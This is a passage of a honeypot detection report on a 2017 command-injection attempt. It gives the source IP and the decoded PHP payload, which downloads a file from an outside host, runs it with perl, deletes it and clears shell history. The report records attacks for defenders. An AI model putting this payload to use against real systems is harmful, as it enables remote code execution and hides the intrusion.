Honeypot Extraction -Command Injection

Date of Detection: 2017.11.20   Source IP Addresses: 27.255.77.103   Attack Raw Pattern: After decoding URL, the pattern is as follows. <? system(“cd /tmp ; wget http://175.126.167.52/apache.txt ; curl -O http://175.126.167.52/apache.txt ; fetch http://175.126.167.52/apache.txt ; chmod +x apache.txt ; perl apache.txt ; rm -rf apache.txt ; history -c “); ?> Malicious File Path from the[…]